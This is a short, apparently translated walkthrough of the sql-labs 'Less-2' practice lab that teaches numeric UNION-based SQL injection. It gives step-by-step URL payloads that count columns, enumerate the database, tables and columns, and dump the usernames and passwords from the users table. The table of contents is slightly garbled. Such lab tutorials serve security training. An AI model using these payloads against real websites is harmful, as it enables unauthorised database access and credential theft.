Table of contents
Step 1: Determine whether it is numeric or character
Step 3: Optimize the statement and change the id to a number that does not exist
Step 4: Use the select statement to query the crit database name
Step 5: Use the select statement to query all table names of the target machine
Step 6: Use the select statement to query all the column names of the target machine
Step 7: Query all usernames and passwords
Take less-2 in sql-labs as an example:
Step 1: Determine whether it is numeric or character
Enter 'to determine whether there is an injection point, if an error is reported, there is an injection point
?id=1'
Use the and statement to determine whether it is a number or a character
1=1 can be displayed normally:
1=2 cannot be displayed normally:
So the judgment is digital injection.
Step 2: Use the group by dichotomy to determine the number of columns in the previous query in the union statement
Because it is a digital injection, there is no need to consider the closure method at all
?id=1 order by 3 --+
Step 3: Optimize the statement and change the id to a number that does not exist
Reasons for doing this:
By default, the joint query union only displays the results of the previous statement of the union. We change the id to a number that does not exist, so that the results of the previous statement cannot be queried, and the content of the last statement is displayed.
?id=-1 union select 1,2,3 --+
Step 4: Use the select statement to query the database name of the target machine
?id=-1 union select 1,2,database() --+
Step 5: Use the select statement to query all table names of the target machine
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
Step 6: Use the select statement to query all the column names of the target machine
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' --+
Step 7: Query all usernames and passwords
?id=-1 union select 1,group_concat(username,'~',password),3 from users --+